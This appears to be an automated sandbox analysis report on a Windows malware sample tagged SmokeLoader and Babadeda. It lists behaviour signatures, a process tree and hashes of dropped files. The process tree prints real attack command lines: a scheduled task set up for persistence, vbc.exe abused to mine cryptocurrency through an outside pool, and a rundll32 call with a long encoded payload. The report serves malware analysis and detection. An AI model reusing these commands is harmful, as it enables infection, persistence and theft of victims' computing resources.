Analysis

  • max time kernel
    152s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2022 08:02

General

  • Target

    75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe

  • Size

    319KB

  • MD5

    7e41f5753ed8d35687df470f3409bad1

  • SHA1

    43080c7f6bd0c2458342d6f92c58e9491f5b5d02

  • SHA256

    75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e

  • SHA512

    8de8644976af6fc6a0c3e9515f1e9c9419390bb12583ea63b8945a502963637e02ff87e7f081323a5eb09fe24af138a70a325f0cc13e20353198eb3917d41185

  • SSDEEP

    3072:wXuWAqqLvVZePF6CcL5mRR9pmePA0qabKZXwqTiKdwTeB9yyOYW6Al2IYInW:klA1LSPF6CcAfVPTKFdDwTO9iflXYCW

Malware Config

Signatures

  • Babadeda

    Babadeda is a crypter delivered as a legitimate installer and used to drop other malware families.

  • Babadeda Crypter 2 IoCs
  • Detects Smokeloader packer 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe
    "C:\Users\Admin\AppData\Local\Temp\75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:5028
  • C:\Users\Admin\AppData\Local\Temp\1993.exe
    C:\Users\Admin\AppData\Local\Temp\1993.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1416
    • C:\Users\Admin\AppData\Local\Temp\685364724-8a9Ah054og8jEcGP.exe
      "C:\Users\Admin\AppData\Local\Temp\685364724-8a9Ah054og8jEcGP.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1788
      • C:\Windows\System32\Wbem\wmic.exe
        wmic os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2440
      • C:\Windows\system32\cmd.exe
        cmd /C "wmic path win32_VideoController get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4740
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic path win32_VideoController get name
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5068
      • C:\Windows\system32\cmd.exe
        cmd /C "wmic cpu get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4736
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic cpu get name
          4⤵
            PID:4920
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell "" "start-process C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3612
          • C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe
            "C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4052
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp76B6.tmp.bat""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3912
              • C:\Windows\system32\timeout.exe
                timeout 3
                6⤵
                • Delays execution with timeout.exe
                PID:3936
              • C:\ProgramData\SystemInformation\V.exe
                "C:\ProgramData\SystemInformation\V.exe"
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of SetThreadContext
                PID:2228
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
                  7⤵
                    PID:3244
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
                      8⤵
                      • Creates scheduled task(s)
                      PID:5016
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RCMiP9SrgQ54AMjhmbUTCtkeoHVVHvADHw.spaceteam -p x -t 5
                    7⤵
                      PID:1088
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c cls
                        8⤵
                          PID:1008
          • C:\Users\Admin\AppData\Local\Temp\4F88.exe
            C:\Users\Admin\AppData\Local\Temp\4F88.exe
            1⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2772
            • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe
              "C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Maps connected drives based on registry
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious use of SetWindowsHookEx
              PID:1932
              • C:\Windows\system32\rundll32.exe
                "C:\Users\Admin\AppData\Roaming\nsis_unse579923.dll",PrintUIEntry |5CQkOhiAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAOVkHwBs8|AtBXEANu8AUgBYNwBIAFWuGwBwADQ9AGwnAGb+LQJZSIPsKOgE|wIAAEiDxCjD|8zMzEyJRCQY|0iJVCQQSIlM+yQIWQFIi0QkMG9IiQQkfQE4SGsAvwhIx0QkEC0B630OfQEQSIPAAYsB3RB9AUBIOZIAcyX+mwOLDCRIA8hIX4vBSItMpwFUdwD|A9FIi8qKCYj3COvBYgVlSIsE+yVg8|AzyUiLUP8YSDvRdDZIg||CIEiLAkg7wv90KmaDeEgYdf8aTItAUGZBg+84a3QHDRFLdQj+DRB4EC50BUiLvwDr1UiLSPkAwf5mAEBTVVZXQVS|QVVBVkFXWQFm|4E5TVpNi|hM|4vySIvZD4X8|vPwTGNJPEGBPP8JUEUAAA+F6r7z8EGLhAmI8|CF|8BIjTwBD4TW3mYRg7wJjC0BD4T9x|PwRItnIESL|18ci3ckRItP|xhMA+FMA9lI|wPxM8lFhckP+4Sk8|BNi8RBi|8QRTPSSAPTiv8ChMB0HUHByu8ND77A9gABRAP90LsRdexBgfqq||wNfHQOg8EB|0mDwARBO8lz|2nrxovBD7cM|05FiyyLTAPr73RYM+2mEHRRQfuLFL0A0zPJigJ|TIvC6w|BycQRewPI4RABQYoA0RD|7TPAM|ZBOwz5ttwQogCDxgGD+P8Icu7rCkiLy|9B|9VJiQT3g|3F4BDEBDtvGHL9r2IBQV9BXkFdv0FcX15dWy8XSO+B7GABYACL6ej|Zv7||0iFwA9bhJlxIEyNqwGLJxDfyDP|6Jt5II1f|wRMjUVCM9KL38v|VCRofCBMi6|gD4RscSBFpBAz98CL040gSIl8JPUgoiBwfCBIi|AP84RMcSCiIFBIjVb|CESNR0BIjYz9JIERSIvY6Hz9rnogjVZI2iAQ3iHM9vPw6GfrIESLBo3TVwg9IKIgWMYhiYRrJICDEt3z8IsO1iCPWImMJG0RAzCNIOj9MesgTItdOous7ikySIucFjJMiWT|JDhEjWdsSTt77EiGIDBMiVyAATeEJNyDEYaO4yHfIP3wrBNIi9Po5|x2ATCKnHMySI2EczL|QYDzIUmLzET7MBigAoPpAXXz+4G8czIhUmV4dd9Ki4Qk9B4xlCT9+PPwA8JIO+hy|zVBO9R2MESN|0lASSvUQbgA9JQAoiBAxiL4dBdEvLQwvjFIjVNsjSBN7yvE6GyAMEiLzv6iIHhIhf90FEz8jDAXMUiNTCRAun0D8|D|10iBxHAhBl0kAAA=
                3⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Accesses Microsoft Outlook profiles
                • Checks processor information in registry
                • outlook_office_path
                • outlook_win_path
                PID:1288
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 1288 -s 720
                  4⤵
                  • Program crash
                  PID:5092
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:4680
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:3404
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:1452
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:4428
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:5112
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:1524
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:4456
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:4492
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:2760
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -pss -s 460 -p 1288 -ip 1288
                              1⤵
                                PID:4576

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\ProgramData\SystemInformation\V.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\ProgramData\SystemInformation\V.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\Users\Admin\AppData\Local\Temp\1993.exe

                                Filesize

                                922KB

                                MD5

                                0cec15477b0a89e89f78961fdd2f56b8

                                SHA1

                                48701957b74b12cfb521c8881ec9beac78f8866d

                                SHA256

                                03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

                                SHA512

                                1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

                              • C:\Users\Admin\AppData\Local\Temp\1993.exe

                                Filesize

                                922KB

                                MD5

                                0cec15477b0a89e89f78961fdd2f56b8

                                SHA1

                                48701957b74b12cfb521c8881ec9beac78f8866d

                                SHA256

                                03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

                                SHA512

                                1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

                              • C:\Users\Admin\AppData\Local\Temp\4F88.exe

                                Filesize

                                15.6MB

                                MD5

                                2b0b6f7adb2c4f30a25aa73f19eb69de

                                SHA1

                                6856ec4a84ba879e8118bbe8fd89237f12977a7e

                                SHA256

                                5d270c5f31a22248cc088654d6ea6f293d000e3780ed1d0e180ea005b6e120bd

                                SHA512

                                4018b7127fe13b8f4ccfd4ad5ac842e4e56e2f4c8637cdaca34b614106724ba24c57d572e11643b89265cfbed128016edf60c0b823224d45004c82585e473b62

                              • C:\Users\Admin\AppData\Local\Temp\4F88.exe

                                Filesize

                                15.6MB

                                MD5

                                2b0b6f7adb2c4f30a25aa73f19eb69de

                                SHA1

                                6856ec4a84ba879e8118bbe8fd89237f12977a7e

                                SHA256

                                5d270c5f31a22248cc088654d6ea6f293d000e3780ed1d0e180ea005b6e120bd

                                SHA512

                                4018b7127fe13b8f4ccfd4ad5ac842e4e56e2f4c8637cdaca34b614106724ba24c57d572e11643b89265cfbed128016edf60c0b823224d45004c82585e473b62

                              • C:\Users\Admin\AppData\Local\Temp\685364724-8a9Ah054og8jEcGP.exe

                                Filesize

                                4.5MB

                                MD5

                                210d0e2a6972569ae0cc2e191610ede7

                                SHA1

                                74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

                                SHA256

                                bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

                                SHA512

                                d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a

                              • C:\Users\Admin\AppData\Local\Temp\685364724-8a9Ah054og8jEcGP.exe

                                Filesize

                                4.5MB

                                MD5

                                210d0e2a6972569ae0cc2e191610ede7

                                SHA1

                                74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

                                SHA256

                                bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

                                SHA512

                                d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a

                              • C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\Users\Admin\AppData\Local\Temp\pb7501FAD4\PB3Dll.dll

                                Filesize

                                202KB

                                MD5

                                142bc2bb269b896cc0f11f9021dcbc52

                                SHA1

                                75b09b25f8f6b3b0fc94fcdcc61d932f303ac418

                                SHA256

                                5da7da9abb77790ddbb87d86b9ea4b01a4f375035827e30fa879dab8c2a737db

                                SHA512

                                150ffd4e66ee126912c6a5071bec750e4b5e603af9cc79b26c63e482f7d5d0aafcae1c995f10b60ba2da138effb19c668e1515f35db3b8b7a508ef34f59d134a

                              • C:\Users\Admin\AppData\Local\Temp\pb7501FAD4\PBCore.dll

                                Filesize

                                472KB

                                MD5

                                016a5d74b1e5a4625bf1ad1aac6bfb68

                                SHA1

                                1a4247c53e1472e2199c12e46389ac0df172bc19

                                SHA256

                                d43cb6a64b707d13ac99936e71c6be436c32a76506ed1fe462e2f9249722d487

                                SHA512

                                f635d56caf1d50e6ad8c5074d0840cdb127380898f5e63b53c0eda1a7230012e4ba622d3639d6ef72bde1250c500fc798b5ef90ff07b53f1eb3343034fb6f3a7

                              • C:\Users\Admin\AppData\Local\Temp\tmp76B6.tmp.bat

                                Filesize

                                147B

                                MD5

                                a3903e722030bbbc7337a62d03da1cb4

                                SHA1

                                8a110411d95bfe6fb6af11f7e5c7f3ed7656387f

                                SHA256

                                8b0203656dabc97ae5ff0f4893ec430f02989627d1d5efa90c309450dec16271

                                SHA512

                                562a722fee804e7a9b68fe48667a880fd9d2922498950d2f5d257b521ff3eb5219e849f53086dc035f9e0115df2c548804cde1b2041e1183479170ce65764dd3

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\HunspellX86.dll

                                Filesize

                                437KB

                                MD5

                                a8d72f9e1e75420cea790ebb071a3810

                                SHA1

                                ba6ab45d2b14cb43bfd952aca642e071ff4784e9

                                SHA256

                                c0cd8aab3a4b3f9ca22378c79ccb012875d3b717ca5646436193a632164be012

                                SHA512

                                21acad06fcf5f95472b893440d12c20a95743271f7341f431f2f0f14b92e3d12c7a91c09228f812cca3a61b7fa413766699b49ffc17197b92acc9f3f5787f7f6

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\Hunspellx86.dll

                                Filesize

                                437KB

                                MD5

                                a8d72f9e1e75420cea790ebb071a3810

                                SHA1

                                ba6ab45d2b14cb43bfd952aca642e071ff4784e9

                                SHA256

                                c0cd8aab3a4b3f9ca22378c79ccb012875d3b717ca5646436193a632164be012

                                SHA512

                                21acad06fcf5f95472b893440d12c20a95743271f7341f431f2f0f14b92e3d12c7a91c09228f812cca3a61b7fa413766699b49ffc17197b92acc9f3f5787f7f6

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\MSVCP140.dll

                                Filesize

                                428KB

                                MD5

                                fdd04dbbcf321eee5f4dd67266f476b0

                                SHA1

                                65ffdfe2664a29a41fcf5039229ccecad5b825b9

                                SHA256

                                21570bcb7a77e856f3113235d2b05b2b328d4bb71b4fd9ca4d46d99adac80794

                                SHA512

                                04cfc3097fbce6ee1b7bac7bd63c3cffe7dca16f0ec9cd8fe657d8b7ebd06dcba272ff472f98c6385c3cfb9b1ac3f47be8ca6d3ea80ab4aeed44a0e2ce3185dd

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\VCRUNTIME140.dll

                                Filesize

                                77KB

                                MD5

                                ba65db6bfef78a96aee7e29f1449bf8a

                                SHA1

                                06c7beb9fd1f33051b0e77087350903c652f4b77

                                SHA256

                                141690572594dbd3618a4984712e9e36fc09c9906bb845ce1a9531ac8f7ad493

                                SHA512

                                ca63eeac10ef55d7e2e55479b25cf394e58aef1422951f361f762ab667f72a3454f55afc04e967e8cdd20cf3eebe97083e0438ea941916a09e7d091818ea830e

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\dm

                                Filesize

                                1.4MB

                                MD5

                                86e3cdb4ce5278becd9ebea27e48d3f0

                                SHA1

                                44b63d3c58310387ca7e535671c34218ad98c7e0

                                SHA256

                                eec35cba92f56bdc5252b2edb3bd8b958ee3cc0ab245d0fe0eb7b7b49f4da46a

                                SHA512

                                7debc2c77eb749eb26b455fa6ab465f13c0060393e6eabad72e1cc2a26bf2274dcf061564004c39ed6c4fc460f0b0e10702d1182774d0f3451ca6cba3ed39018

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\extract_help.htm

                                Filesize

                                5KB

                                MD5

                                2b28b429bad9ecc1be318437a2e4f1ff

                                SHA1

                                cf52adfd6760aa6fd4e35b27ba8dc83f68472063

                                SHA256

                                fa989ac26c974984a87ed232f86f4404115df81e7816abaee52d5d5fa0ca3b1f

                                SHA512

                                606219e30267299f0aa4a6e556913528b743d82bab0d28db769db7db81b1a9a3554792955a3dc032f5cdb6dfd62ee113f33b3a18489c85d6d71c22d7fb857134

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libminddb.dll

                                Filesize

                                13KB

                                MD5

                                7e1ad32b95b09b1b3fc5a5bec6d5099a

                                SHA1

                                35e2579111a22f861ec5448fc69cdfcbd29fa624

                                SHA256

                                1d0e7355da042f27ed046d30853a2b381f2cfe12230afe9977fb6d600577b3fb

                                SHA512

                                f5fd5692d17e9d97fa1eee1546e896015a7a6431ef61afb8d186e278789354c44bd48bcfa6d16f2337a1019799eb67361e9e9bea4d0a19cdd66f850b36926420

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libminddb.dll

                                Filesize

                                13KB

                                MD5

                                7e1ad32b95b09b1b3fc5a5bec6d5099a

                                SHA1

                                35e2579111a22f861ec5448fc69cdfcbd29fa624

                                SHA256

                                1d0e7355da042f27ed046d30853a2b381f2cfe12230afe9977fb6d600577b3fb

                                SHA512

                                f5fd5692d17e9d97fa1eee1546e896015a7a6431ef61afb8d186e278789354c44bd48bcfa6d16f2337a1019799eb67361e9e9bea4d0a19cdd66f850b36926420

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libmsagl.dll

                                Filesize

                                32KB

                                MD5

                                53634bc76f19ea065981ac1b02225df9

                                SHA1

                                7d1cb4ae535c30d2443c4b8f14927300c8449839

                                SHA256

                                e9053b628bf89440e0ad4874a5c234fe058539f20f9bf02d36c7492fed70857a

                                SHA512

                                3b46f34b4d370f44f219f0a404ae1f9a53897ddaabfb7665197dc16b538a13d9ee89af7053fd74998dc38321af8f076759f535d5a855f6ff5212d88704c79d3a

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libmsagl.dll

                                Filesize

                                32KB

                                MD5

                                53634bc76f19ea065981ac1b02225df9

                                SHA1

                                7d1cb4ae535c30d2443c4b8f14927300c8449839

                                SHA256

                                e9053b628bf89440e0ad4874a5c234fe058539f20f9bf02d36c7492fed70857a

                                SHA512

                                3b46f34b4d370f44f219f0a404ae1f9a53897ddaabfb7665197dc16b538a13d9ee89af7053fd74998dc38321af8f076759f535d5a855f6ff5212d88704c79d3a

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libmsagl.dll

                                Filesize

                                32KB

                                MD5

                                53634bc76f19ea065981ac1b02225df9

                                SHA1

                                7d1cb4ae535c30d2443c4b8f14927300c8449839

                                SHA256

                                e9053b628bf89440e0ad4874a5c234fe058539f20f9bf02d36c7492fed70857a

                                SHA512

                                3b46f34b4d370f44f219f0a404ae1f9a53897ddaabfb7665197dc16b538a13d9ee89af7053fd74998dc38321af8f076759f535d5a855f6ff5212d88704c79d3a

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\license.txt

                                Filesize

                                10KB

                                MD5

                                f0656f89c18cb41595453ab550ed44fb

                                SHA1

                                430bacdbcd2077547dbde66f53624d78c71c4577

                                SHA256

                                327dce257228c2a74d8c5c7cb23d7bb338e2e270764ea35cf33c14e570cac981

                                SHA512

                                8e468a04fe178398f8e32ce2d77c8530e15310e0bc2df71cb81af175735f58811a733bf8f35d652febb090993fea571385fb193e5317841cfc1e0b6ba2046efe

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\md.dat

                                Filesize

                                200KB

                                MD5

                                33526dea59ea40b601a61c9ac5bfa93e

                                SHA1

                                b7a06b5de9f02f6c584fe5c7b2d7f3056c52f5aa

                                SHA256

                                7dfa9316378c0ec79ddbfbf08eaf1f01a86e7e11aa0505adac7112425351419f

                                SHA512

                                c65f8e3080c646f19b31b7e986490c76f2e9cb6e7600fa3d1d0fedcdc69e6b33618609ca2313a4c21fa2e7581f4ebdb782133966e0788e99e97c27f95fe67207

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\msvcp140.dll

                                Filesize

                                428KB

                                MD5

                                fdd04dbbcf321eee5f4dd67266f476b0

                                SHA1

                                65ffdfe2664a29a41fcf5039229ccecad5b825b9

                                SHA256

                                21570bcb7a77e856f3113235d2b05b2b328d4bb71b4fd9ca4d46d99adac80794

                                SHA512

                                04cfc3097fbce6ee1b7bac7bd63c3cffe7dca16f0ec9cd8fe657d8b7ebd06dcba272ff472f98c6385c3cfb9b1ac3f47be8ca6d3ea80ab4aeed44a0e2ce3185dd

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\msvcp140.dll

                                Filesize

                                428KB

                                MD5

                                fdd04dbbcf321eee5f4dd67266f476b0

                                SHA1

                                65ffdfe2664a29a41fcf5039229ccecad5b825b9

                                SHA256

                                21570bcb7a77e856f3113235d2b05b2b328d4bb71b4fd9ca4d46d99adac80794

                                SHA512

                                04cfc3097fbce6ee1b7bac7bd63c3cffe7dca16f0ec9cd8fe657d8b7ebd06dcba272ff472f98c6385c3cfb9b1ac3f47be8ca6d3ea80ab4aeed44a0e2ce3185dd

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\settings.ini

                                Filesize

                                102B

                                MD5

                                5b9efae16ed24a00cd143caa386017e1

                                SHA1

                                fb52e115a189fc3c16cd973473dbeccc588e7b71

                                SHA256

                                26c1579b128be6b0ae2fbeebf556ea4f0facb6ec8bf318736b06ee1e06704523

                                SHA512

                                738e2ab5f0a08095d8962490eb8535f19dc34070680eb5d975fb6926bb735543353cd7de3c901c15cf14107152e367c8c5650fb131683068d8ebbc030603cc6c

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe

                                Filesize

                                9.6MB

                                MD5

                                4e8bbd13922b08c0a0b851b1bce6b2e0

                                SHA1

                                4510265de5c1d395b451bcc2c5847ff88292dd7f

                                SHA256

                                bcc187bb85d27785ebf14930d1156096076ee89497878b252f277cef5d87915a

                                SHA512

                                4ba1810f998f132423f2172cbb154601ba3d705c8fdcabbb25eeec2042ca2e2cacf78ed6d281aad7a1f2caa5e220e9a6b03285b6e7658c078a917c39ab61d7b0

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\unins000.dat

                                Filesize

                                12KB

                                MD5

                                390f806d9f8c354e90b1c1a4f2a6407b

                                SHA1

                                bf3b7162bdf3e3dbff94fdfe5d7ef6fa793f8b26

                                SHA256

                                13c0e3080ba7b2d299399d53fe82053719bebdf0c86f14092d89037ce00591f9

                                SHA512

                                87c3d007484f18d6126ce7081eaeccebc9a265d8eaf46cdf3039c8b77c8fb921a1a1a24e5f4a1d7a510fb64e7d5ff0b6358356a885108477f772396ee01c9f29

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\unins000.msg

                                Filesize

                                22KB

                                MD5

                                524800545e00c0806daa96054758d2a1

                                SHA1

                                36dbb61f99a5064a4059079b39a26b9bd89db67c

                                SHA256

                                45f19302c2cfca8445e1d3a0b34646adae35c05efe5df79e32d451eed8326672

                                SHA512

                                92f227567a8ccd09947279fa285efa0abcfafa1fefa33912f8460bb7c17267c3b60795ce8d92c1a1c01da6960c6171a82126deb36c6c6bc4c063717db07dbcae

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\vcruntime140.dll

                                Filesize

                                77KB

                                MD5

                                ba65db6bfef78a96aee7e29f1449bf8a

                                SHA1

                                06c7beb9fd1f33051b0e77087350903c652f4b77

                                SHA256

                                141690572594dbd3618a4984712e9e36fc09c9906bb845ce1a9531ac8f7ad493

                                SHA512

                                ca63eeac10ef55d7e2e55479b25cf394e58aef1422951f361f762ab667f72a3454f55afc04e967e8cdd20cf3eebe97083e0438ea941916a09e7d091818ea830e

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\vcruntime140.dll

                                Filesize

                                77KB

                                MD5

                                ba65db6bfef78a96aee7e29f1449bf8a

                                SHA1

                                06c7beb9fd1f33051b0e77087350903c652f4b77

                                SHA256

                                141690572594dbd3618a4984712e9e36fc09c9906bb845ce1a9531ac8f7ad493

                                SHA512

                                ca63eeac10ef55d7e2e55479b25cf394e58aef1422951f361f762ab667f72a3454f55afc04e967e8cdd20cf3eebe97083e0438ea941916a09e7d091818ea830e

                              • C:\Users\Admin\AppData\Roaming\nsis_unse579923.dll

                                Filesize

                                58KB

                                MD5

                                664e46926466a2d4c9b87540f4853c39

                                SHA1

                                b172d1c2bde331770b0a944fcf6a9e2d75ded66b

                                SHA256

                                92a7c3296a561fb39798f821173e69d1feff44ff3a84caa4c6bb890945e79488

                                SHA512

                                1490ee65220c71a9f445df4b0f34d0c7bd3ece2e58253cfa3194d34e813843e0f71ea7bce0f0ae562a620334fdf3589262ca2f3209414936aa28a365db64ff03

